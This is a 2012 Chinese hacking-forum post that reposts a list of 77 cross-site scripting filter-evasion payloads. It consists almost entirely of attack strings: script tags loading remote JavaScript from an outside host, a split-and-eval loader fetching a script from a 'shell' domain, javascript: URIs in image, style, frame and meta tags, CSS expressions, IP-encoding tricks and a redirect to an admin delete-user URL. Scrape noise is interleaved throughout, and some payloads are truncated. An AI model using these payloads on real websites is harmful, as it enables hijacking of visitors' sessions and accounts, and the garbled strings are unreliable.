貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
' }1 u& y" g1 O9 I* b
q+ ^ Z b( V. z (1)普通的XSS JavaScript注入% \. o0 j5 i) V9 w, U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& P: O0 X1 p+ I- o% `$ P
/ p6 T7 d2 ^; Q/ e; D (2)IMG标签XSS使用JavaScript命令
% Y% c2 E2 a2 y6 F" s" ~$ w <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& O, u4 k' a) L1 X
" c( t1 q' _" E6 @ (3)IMG标签无分号无引号1 w5 b( m8 O/ F% S: f6 m
<IMG SRC=javascript:alert(‘XSS’)>& m0 [" W; Z0 g4 @. P
i3 v/ y( b/ b# Y8 ~, M/ U (4)IMG标签大小写不敏感0 q$ Y5 I$ Z9 w0 ]2 [6 L: k
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 q: b1 O; c/ v, ]+ o
. y' T1 L# B9 l( S* b! [+ T% P (5)HTML编码(必须有分号)* X B2 `& {% }4 X* M, e( b( O& _
<IMG SRC=javascript:alert(“XSS”)># s/ M8 L' L5 ]* z2 y, M ^
. v; M: j3 L9 l. b3 s" u (6)修正缺陷IMG标签1 T( ~- Y0 l+ V# a" \$ |+ G$ ~
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' ~' y f$ h) X# L1 [ \
6 } H( L. m* u: g3 E (7)formCharCode标签(计算器)0 X F% [" |* A. u3 l3 r: R" h P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( r. |# b- P. Z2 [- P
* v4 \& e/ b- V$ A- ~" o (8)UTF-8的Unicode编码(计算器); L9 D. R9 W) K7 x# u5 D
<IMG SRC=jav..省略..S')>* _- K* }3 {9 o7 z
* x1 \: B& S' o6 ^: T0 D (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: e- R; i5 Y, g2 ?6 e8 A <IMG SRC=jav..省略..S')>5 _/ H+ ~! L: G" J
; K& j$ r0 d5 v3 i& U3 U (10)十六进制编码也是没有分号(计算器)
: `7 s( R7 j- G; j+ { <IMG SRC=java..省略..XSS')>' q+ ^4 r+ `* M" K
' k6 M- e/ v* Q2 O (11)嵌入式标签,将Javascript分开6 {% F+ w7 \$ t! R+ K
<IMG SRC=”jav ascript:alert(‘XSS’);”>: i7 }0 ?) }& ^5 b: Q5 R
- ^# G4 g$ l1 F: l' r3 Y (12)嵌入式编码标签,将Javascript分开) o4 C9 \' \; M/ w: _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 e( V3 q4 w' E& r6 } O/ x4 i: [
9 Z- o) U8 N* R8 ]6 {; S4 s- k (13)嵌入式换行符
; d; V" W d2 s8 d2 S7 }$ V) R( Y7 w <IMG SRC=”jav ascript:alert(‘XSS’);”>
& m3 p+ s; A4 K- q2 h6 c o- h
1 ~' v; R, Z# a( p (14)嵌入式回车# f" q0 V5 |7 e1 U* o
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, [, _2 n. T G: i* l9 E. e
: f( q' Q( _- X* X3 u& Y( w4 T (15)嵌入式多行注入JavaScript,这是XSS极端的例子, G ?1 V4 o* X( J0 g
<IMG SRC=”javascript:alert(‘XSS‘)”>
) P3 }" }" L9 u; F$ w0 g, @2 ?1 b- L0 Y8 X" B/ k' F- U* T! e
(16)解决限制字符(要求同页面)/ F4 E2 j: M( i
<script>z=’document.’</script>7 ]" j: a8 b( ~" Q) v9 v
<script>z=z+’write(“‘</script>
1 P4 q& d' ~, n6 L$ ^/ \ <script>z=z+’<script’</script># ?" a% y. Q( x
<script>z=z+’ src=ht’</script>
( K! _. Q5 K. b. d2 L <script>z=z+’tp://ww’</script>9 f% Z2 b" U" i" g% P
<script>z=z+’w.shell’</script>
3 q$ H% c- s2 h1 f7 w& I3 e9 L <script>z=z+’.net/1.’</script>
7 T0 K/ T) s7 G( f! P l8 l <script>z=z+’js></sc’</script>5 R, x* P/ R% \
<script>z=z+’ript>”)’</script>, i- s$ N0 B( h6 x9 b0 ?
<script>eval_r(z)</script>
7 E0 \- v+ V# s' `3 x
! A2 D/ S$ P" ^- @# F2 M2 i (17)空字符
4 a4 L9 h# K! m! N* E; { perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out$ j, _! O' q& _
8 Z5 c* a: z6 o+ A
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 I" r [( T# K" S2 m7 `* \ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 I/ i3 l" U* C3 }) F, Y( [
' h7 r( V6 E Y+ Z (19)Spaces和meta前的IMG标签
6 H0 |1 L) e$ ?" i0 s <IMG SRC=” � javascript:alert(‘XSS’);”>
/ _9 z6 x V* E; r8 `0 O. e. v& ]4 L1 K! U
(20)Non-alpha-non-digit XSS
3 d+ j& e& k( O$ r <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. p+ @& U& @( A2 D8 i
, I% l! n- n* B4 K# ` (21)Non-alpha-non-digit XSS to 2, F& q9 k2 M3 \' s
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 H+ Y. k) p5 W7 G/ t3 }4 g
8 } D2 V( x% A. @# t' i1 I; A% x% p (22)Non-alpha-non-digit XSS to 3% Q) U# B/ L* B& `/ X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 `3 g( }6 X# W" o [; B2 [+ r$ l5 G3 j! b
(23)双开括号: J; B1 v* @! G* [! Q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>9 d% S- e: L; e Y A. \" b
9 x9 P) v1 P. o7 W4 Y# b( t0 p3 w (24)无结束脚本标记(仅火狐等浏览器). n# A8 t% P, Y3 j* \3 B( y! E% c' O% y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
0 {$ W) y- {2 R" _6 i+ {& I/ v! T& e. Q: u) j+ A h5 e. z5 D+ z
(25)无结束脚本标记2
/ p, i. O% x1 h% D <SCRIPT SRC=//3w.org/XSS/xss.js>
1 E, t' r, l/ w* p" V
; J+ J5 g; ]' [; d# U! z) a (26)半开的HTML/JavaScript XSS
, B3 l1 b% g3 |% P9 M <IMG SRC=”javascript:alert(‘XSS’)”
5 g5 N! N. T. l& r/ M; `
4 @% M% l# q8 J2 O7 t( t& O& u (27)双开角括号
% M( _5 E. L `) S7 L <iframe src=http://3w.org/XSS.html <
- x) T2 K; |- g: w4 O
! c% V" U5 B& j2 H1 S' \ (28)无单引号 双引号 分号
# o4 M- B9 G! z# s; S <SCRIPT>a=/XSS/
7 y- K, G) _" d, J. \+ o* L$ _$ V alert(a.source)</SCRIPT>
5 b8 r$ Q8 _$ t: V( @6 j" C: U0 s1 I: B% ` Z! G, \ f
(29)换码过滤的JavaScript
! q( A) V* ?# H7 s \”;alert(‘XSS’);//5 A: a: K3 c D% D ~ S! Q4 K
; }" [5 F% p- o$ _$ V1 ~8 F, Q (30)结束Title标签3 p4 b/ [: U, a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 [. V3 C d+ s. Q. f
+ M2 T! t) S l" `/ A. |: i (31)Input Image% j# r7 }6 C9 P, H# F% `
<INPUT SRC=”javascript:alert(‘XSS’);”>& ` y& J9 s2 [# o& S" o7 x& C4 g5 T
" ~6 |7 g: O7 e2 O+ u9 ^$ _% l
(32)BODY Image
2 {) C* |2 T( h& Q- @ <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 y8 K+ o: X+ I7 d* j* B! T) Y( R+ V! @: I) O0 H! c% e3 W
(33)BODY标签
0 H. f" d( o" j; j <BODY(‘XSS’)> b$ E+ R7 ]9 s% x# I
@( A! K! f( n; S+ b3 ?$ _ (34)IMG Dynsrc
5 y$ K k, O' l% h: X <IMG DYNSRC=”javascript:alert(‘XSS’)”>' Y0 G- e" c8 `- _. q$ i+ R
8 l: e# y+ v) C7 c& }. {4 G (35)IMG Lowsrc- O* Z( E* |9 I( T
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. H: T; m, E0 f$ H' b9 Z' U
! d# D/ n( c1 D4 [2 c N
(36)BGSOUND
1 }& m8 _ s( K# ~; \: f6 d <BGSOUND SRC=”javascript:alert(‘XSS’);”>
' Y5 p3 q; [# D4 v3 F8 t2 c; a; z: x/ c5 { w/ V8 a: n* @) e
(37)STYLE sheet
: v+ q4 X2 ` v! b) h1 \ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% d/ e* a* |) A
7 z' d, H% ^7 d. w/ ?) A* i (38)远程样式表7 f% {% X$ k# o! e( q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 O# }6 z u% x/ b
$ m8 \1 `+ T: D+ n (39)List-style-image(列表式)
, X: T A! V3 l9 G7 _% ^ <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( O; J9 \# E8 r: P- A$ V( i
0 F: @# n2 P2 n' U9 T3 \& H
(40)IMG VBscript
) e" t9 s6 x- _/ y% K) B0 U <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS* N: _. k& g O, e0 d M4 J8 d) t
3 L2 g9 ]/ y$ D [2 I (41)META链接url g- z! S$ h* Y, W1 z$ U& m8 v
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. S4 y+ d; |& b' \- P5 {" k
$ |# [ R$ l& [$ l (42)Iframe% ~9 K0 e( Z, R* X# J$ }3 G1 p
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( n: c3 _8 c" V2 z0 r
1 l0 P8 a4 S7 Z. C& i" r (43)Frame
( K) L* d6 M# ?" q# w X5 q <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>& O4 e2 H4 X- O9 w/ q l& A7 w5 J
# u+ s: o# i9 A
(44)Table
- ]: H' B' B+ q. b, g <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. [# k: b* U" x5 b# r2 w3 d
8 n0 u9 t) N5 A (45)TD
4 T2 t- m9 n( } <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 O! |! h/ C8 J, k5 R5 q, T
r5 j2 ~( D9 t3 G0 L9 G (46)DIV background-image, R9 B* F8 x- }5 L2 ~( X
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" c0 @, R9 ~4 ^
( c8 }/ P/ ?3 S4 k
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). B2 t1 h" s6 f2 b/ y. j
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>. s& U. F+ C+ f" K, i* ?9 n
1 J, @0 ^5 p$ J, L# W
(48)DIV expression
M' u1 u) ^9 D <DIV STYLE=”width: expression_r(alert(‘XSS’));”>2 d2 H9 O0 ^; B1 @: J8 v
& g" z+ P: r9 |* \ u (49)STYLE属性分拆表达
* M# A7 n: x- S/ V1 A <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>) i! V. c) }& u/ s* K; A9 A
. D9 x' R u$ m9 F (50)匿名STYLE(组成:开角号和一个字母开头)
1 o! Q! D6 ]; S% f <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; H. N. ~( ^" @) c V
8 p9 X6 r7 E" b { _
(51)STYLE background-image) a) R3 \3 L, b8 b1 x5 T; ?/ ~0 s
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 i, l/ i5 `7 @0 r2 i9 F% j
7 P3 t: L; Z {7 G0 Q/ ] (52)IMG STYLE方式
; B; F" v" B3 V- j% s/ [* u exppression(alert(“XSS”))’>
5 H. N' s* L& Q. e4 \4 `
) [8 X. i7 F8 P7 _2 S (53)STYLE background
4 d$ D6 _ l& w0 h, p7 a8 l+ U <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- @- A1 s. U6 i, L
" M( k5 t# a$ `0 F; W: f
(54)BASE" i o' h) f% P% I% R" E$ `
<BASE HREF=”javascript:alert(‘XSS’);//”>+ V6 N2 t. _4 ^; y, f
) v6 U3 ~9 c$ B
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 m3 @) n( h* G4 q$ m7 I- m3 K <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>$ f! N* w, ~9 p6 D% c
9 {: n/ u1 w" t# Z0 i/ f: y9 N
(56)在flash中使用ActionScrpt可以混进你XSS的代码6 @5 M* w l7 J, X4 @$ r( W
a=”get”;
& T" M. S. f. B% M6 c b=”URL(\”";
% S! |# p+ Q: f; N1 a" T& b c=”javascript:”;9 [( f6 ^, w9 |/ M! [
d=”alert(‘XSS’);\”)”;& r0 W- P1 M: \1 y2 i H! y0 _* ` h
eval_r(a+b+c+d);
4 Y, f9 U" ~6 B s+ ?" U9 {
7 k2 ^5 b s3 Y8 H+ O8 p0 w (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 [$ p$ v8 W# l6 E9 M0 m <HTML xmlns:xss>1 X! | X! f$ U9 I
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: [6 S: |* X- |% k3 S: Z/ F8 j <xss:xss>XSS</xss:xss>
! B# H7 }- I o </HTML>
( ~5 V# U4 j4 ?$ N+ Z
2 a& _, d$ N! k- t (58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 T( m: v2 H: X- `' i% x* P
<SCRIPT SRC=””></SCRIPT>- L; @) S, _' k7 n X
' o/ ~5 U3 O+ S (59)IMG嵌入式命令,可执行任意命令7 u; e9 \9 [3 P) h( z2 Q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 ~7 l! ]4 }* y S- m" V
5 k- h3 j1 @; `5 o# t7 k2 ^0 ^ (60)IMG嵌入式命令(a.jpg在同服务器)& l# M) ]' Q+ V! @! G
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
) p9 z( A7 ^6 }! [( V B* ?/ w0 s7 B2 T6 l- |7 C9 ]6 F7 M
(61)绕符号过滤
$ B! K1 N: g1 o) z <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# h7 P& b1 N! V8 B
/ v6 A4 Z4 P a (62)
7 `1 B0 G& G. B+ ]$ b <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>' m: ^9 z7 v n0 Y# {3 S9 c- X7 H; q
X* W0 Q& _: O7 Z( P: U5 G (63)2 N1 P, a. H- |, s
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 [, s( b1 Z, ?5 q0 d# a! z4 C
& q2 E9 M# U2 U (64)
5 T7 M" h" P R <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# [' I @- D6 ]% d* s! q! x; x; b
(65)( ]$ B! y, E: t. l3 t
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>7 s4 d: V4 B; J0 h4 D' D3 ?
( k: \4 x4 K! i. z! y# s
(66)
# e3 H* _# C% K$ a, \. k <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 ?* F0 E% X* s
, i9 ]; ~/ J8 g9 }
(67)# H+ j3 O, N4 `5 u4 s% e
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
* D! m+ A- u& C& k9 H, w3 K
9 W" M$ U6 ^" ?) {- e- ~! E (68)URL绕行) q. G& ]: h4 b) Z+ Z
<A HREF=”http://127.0.0.1/”>XSS</A>
" M" d. f3 k8 @8 O( b# q _8 i$ T/ D
(69)URL编码
. O$ j. U% x5 ^% b2 i2 Y5 R2 b+ T <A HREF=”http://3w.org”>XSS</A>
, Q8 S! N+ x, J: X% C9 n4 q3 E1 n# b
(70)IP十进制" h% u, R/ G& _/ p) o; X$ @$ U
<A HREF=”http://3232235521″>XSS</A>
5 \4 q; H, O) }5 ~; n% q* J
) k. h8 Q4 G, e Q( b$ i7 {; [ (71)IP十六进制0 u) e3 V2 W4 ^! ]. Z% ?
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>3 K$ O- \1 w; w) E) o
% U8 z* O; `' H% b' E
(72)IP八进制
9 R7 {) N( S* A, q <A HREF=”http://0300.0250.0000.0001″>XSS</A>
* J6 u% R: V6 Z! |! @$ i9 B* \: z) I6 y* K; N9 e4 D
(73)混合编码
" [" C! J6 D% }6 ^. J( G <A HREF=”h
7 N( V( H# l, v* h7 w1 } tt p://6 6.000146.0×7.147/”">XSS</A>2 q$ K C& t* w
& C* ?: a1 t0 A (74)节省[http:]
# _- y# Y: o, |9 _ <A HREF=”//www.google.com/”>XSS</A>
* e8 Y. ^# C* t5 {! n, l- R% F. J
, K) @; }0 f; L; Y. p$ n7 y) K (75)节省[www]
9 r. F5 |# J# j d# x <A HREF=”http://google.com/”>XSS</A>
7 {6 b' k3 V! i" y% D
8 a+ Q/ \8 ]1 B- U (76)绝对点绝对DNS* w9 g) W$ Y& y) m4 a4 `
<A HREF=”http://www.google.com./”>XSS</A>
8 j, ?$ S1 p3 w" n t, t# ^+ B& S9 _
(77)javascript链接- l: U% b7 }* k# H2 f( t" Y' h+ B
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对